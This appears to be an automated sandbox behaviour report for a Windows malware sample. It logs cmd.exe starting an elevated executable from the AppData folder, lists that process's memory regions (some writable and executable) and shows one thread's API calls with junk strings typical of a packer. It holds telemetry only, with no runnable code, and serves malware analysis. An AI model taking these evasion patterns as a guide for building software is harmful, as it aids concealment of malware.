|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ff9ab6b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ff9ab6d8940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ff9ab6d7460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ff9a8376e50 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, os_pid = 0xcf0, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Thread | Resume | process_name = c:\windows\system32\cmd.exe, os_tid = 0x700 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #21: roamingqtp35.exe
5867
24
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\users\nd9e1fyi\appdata\roamingqtp35.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:57, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf0 |
| Parent PID | 0x6fc (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CF4
0x
CFC
0x
C34
0x
D00
0x
D08
0x
D10
0x
D14
0x
D18
0x
D3C
0x
44C
0x
8B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0006ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00065fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00183fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00175fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001f5fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| roamingqtp35.exe | 0x00400000 | 0x0044afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x004b3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x00490fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004a0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x004a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00610000 | 0x006cdfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x007cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00957fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x00ae0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x01eeffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01f4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x01f10fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f20fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x01f30fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x02050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x0213ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x020cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x0204ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002050000 | 0x02050000 | 0x02050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x02060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x02070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x02080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x0209ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x020a3fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002090000 | 0x02090000 | 0x02095fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x02090fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020a0000 | 0x020a0000 | 0x020a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x020b5fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| counters.dat | 0x020b0000 | 0x020b0fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000020c0000 | 0x020c0000 | 0x020cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x0210ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02112fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02127fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x02122fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x0213ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x02140000 | 0x02476fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002480000 | 0x02480000 | 0x0287afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| ole32.dll | 0x02880000 | 0x02969fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x0297ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002980000 | 0x02980000 | 0x029bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02abffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02afffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02bfffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002c00000 | 0x02c00000 | 0x02c00fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02c4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02d8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d90000 | 0x02d90000 | 0x02e8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002e90000 | 0x02e90000 | 0x02e90fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02edffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ee0000 | 0x02ee0000 | 0x02fdffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002fe0000 | 0x02fe0000 | 0x02feffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002ff0000 | 0x02ff0000 | 0x02ff0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x03000fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x03008fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x03055fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x03010fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x03020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x03070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x03080fff | Private Memory | Readable, Writable |
|
|
|
- |
| wow64win.dll | 0x542b0000 | 0x54329fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x54330000 | 0x5437ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x54380000 | 0x54387fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x6f970000 | 0x6fa2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x6fa30000 | 0x6fa5efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x6fa60000 | 0x6fa72fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x6fbd0000 | 0x6fbe8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x6fc70000 | 0x6fc77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winhttp.dll | 0x6fcf0000 | 0x6fd8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x6fd90000 | 0x6fda1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x6fdc0000 | 0x6ffccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x6ffd0000 | 0x7014dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x71540000 | 0x71586fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x71590000 | 0x71597fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x715a0000 | 0x715cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x715d0000 | 0x71653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x71660000 | 0x716aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x71720000 | 0x719eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73860000 | 0x7387afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73bb0000 | 0x73bb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73bc0000 | 0x73bddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x73be0000 | 0x73be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x73bf0000 | 0x73dacfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x73db0000 | 0x73dbbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x73ee0000 | 0x73f71fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x73f80000 | 0x73fc3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x740c0000 | 0x7411efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74120000 | 0x741fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x74300000 | 0x743bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x74530000 | 0x7455afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x74560000 | 0x74565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74610000 | 0x746bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| windows.storage.dll | 0x746c0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x74bc0000 | 0x74c4cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74c50000 | 0x74dc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x74f10000 | 0x74f54fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74f60000 | 0x74f6efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74fd0000 | 0x75027fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75090000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x750e0000 | 0x764defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x764e0000 | 0x7662efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x76630000 | 0x766b3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766c0000 | 0x7683dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76840000 | 0x76986fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76dc0000 | 0x76e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76e40000 | 0x76e76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x76e80000 | 0x76e8dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76e90000 | 0x7700afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff9abbfffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff9abdc1000 | 0x7ff9abdc1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 78 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0xcf4
833
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7413a980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74137570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74139e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74144ff0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 |
|
1 | |
| Ini | Read Section | file_name_orig = Win.ini, section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = eìvHÈÚhH |
|
250 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x74139950 |
|
1 | |
| File | Delete Directory | directory = laxodaromowuku himefuvuriyuseyu zegiyevufebucena sanavazobijayu |
|
249 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74137a50 |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
